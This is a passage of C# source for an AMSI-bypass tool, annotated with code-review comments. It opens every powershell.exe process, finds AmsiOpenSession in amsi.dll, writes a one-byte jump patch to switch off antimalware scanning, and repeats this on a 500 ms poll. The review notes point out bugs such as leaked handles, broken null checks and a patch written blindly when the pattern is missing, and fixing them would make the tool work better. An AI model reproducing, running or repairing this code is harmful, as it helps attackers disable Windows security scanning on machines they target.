            // without SeDebugPrivilege — TODO confirm for the intended deployment.
            IntPtr ProcessHandle = OpenProcess((Int32)Process_access.PROCESS_VM_OPERATION | (Int32)Process_access.PROCESS_VM_READ | (Int32)Process_access.PROCESS_VM_WRITE, false, (UInt32)tpid);
            // NOTE(review): IntPtr is a struct, so "== null" is always false and a failed
            // OpenProcess (IntPtr.Zero) is not detected here; it only surfaces when
            // ReadProcessMemory fails on the zero handle. The same applies to hm and AmsiAddr
            // below — compare against IntPtr.Zero instead.
            if (ProcessHandle == null)
                return -1;
            // NOTE(review): ProcessHandle is never passed to CloseHandle, so every call leaks a
            // process handle. PatchAllPowershells calls this for every powershell.exe on every
            // poll, including already-patched ones, so the leak grows over time.

            IntPtr hm = LoadLibrary("amsi.dll");
            if (hm == null)
                return -1;

            IntPtr AmsiAddr = GetProcAddress(hm, "AmsiOpenSession");
            if (AmsiAddr == null)
                return -1;

            // Read the first 1024 bytes of the target's AmsiOpenSession; the scan runs on these.
            byte[] buff = new byte[1024];
            IntPtr ReadPm = IntPtr.Zero;
            if (!ReadProcessMemory(ProcessHandle, AmsiAddr, buff, 1024, out ReadPm))
                return -1;

            // NOTE(review): applied unconditionally. When SearchPattern finds nothing it returns
            // 1024, so the 0xEB is written 1024 bytes past AmsiOpenSession into unrelated code
            // of the target's amsi.dll, and this method still reports success.
            int matchAddress = SearchPattern(buff, buff.Length, pattern, patternSize);
            AmsiAddr += matchAddress;
            int byteswritten = 0;

            // No VirtualProtectEx is issued (the PAGE_* constants above are unused); this
            // presumably relies on WriteProcessMemory handling the protection of the
            // image-backed .text page itself — TODO confirm. After this write the target's
            // amsi.dll code no longer matches the on-disk image.
            if (!WriteProcessMemory(ProcessHandle, AmsiAddr, patch, 1, ref byteswritten))
                return -1;
            return 0;
        }

        /// <summary>
        /// Walks a Toolhelp process snapshot, calls <see cref="PatchAmsi"/> for every process
        /// whose image name is exactly "powershell.exe" (ordinal, case-sensitive; pwsh.exe is not
        /// matched) and prints each PID the first time it is patched.
        /// </summary>
        public void PatchAllPowershells()
        {

            int procId = 0;
            // NOTE(review): result is never assigned from PatchAmsi, so it stays 0. The
            // "else if (result == -1)" branch is unreachable, failed patches are silent, and
            // "Result: " could only ever print 0.
            int result = 0;
            string processName = "powershell.exe";

            IntPtr hSnap = CreateToolhelp32Snapshot(SnapshotFlags.Process, 0);

            // The unchecked IntPtr -> UInt32 cast truncates a 64-bit INVALID_HANDLE_VALUE (-1) to
            // 0xFFFFFFFF, which is what makes this comparison work on x64.
            if ((UInt32)hSnap != INVALID_HANDLE_VALUE)
            {
                PROCESSENTRY32 entry = new PROCESSENTRY32();

                entry.dwSize = (uint)Marshal.SizeOf(entry);

                if (Process32First(hSnap, ref entry))
                {
                    // Only enumerates when the first entry is PID 0 (System Idle Process), which
                    // is then skipped by the extra Process32Next; if PID 0 is not first, nothing
                    // is scanned. Assumes PID 0 is always the first entry — TODO confirm.
                    if (entry.th32ProcessID == 0)
                    {
                        Process32Next(hSnap, ref entry);
                        do
                        {
                            if (entry.szExeFile.Equals(processName))
                            {
                                procId = (int)entry.th32ProcessID;

                                // NOTE(review): PatchAmsi runs before the alreadyPatched check
                                // (left-to-right evaluation), so already-patched processes are
                                // re-patched on every 500 ms poll; the list only suppresses the
                                // console line.
                                if (result == PatchAmsi(procId) && !alreadyPatched.Contains(procId))
                                {
                                    Console.WriteLine("[+] AMSI Patched: " + entry.th32ProcessID);
                                    alreadyPatched.Add(procId);
                                }
                                else if (result == -1)
                                {
                                    Console.WriteLine(entry.th32ProcessID);
                                    Console.WriteLine("Result: " + result);
                                    Console.WriteLine("[-] Patch Failed");
                                }
                            }
                        } while (Process32Next(hSnap, ref entry));
                    }
                }
                // The snapshot handle is closed here, unlike the process handle opened in PatchAmsi.
                CloseHandle(hSnap);
                return;
            }
        }
    }
}
--------------------------------------------------------------------------------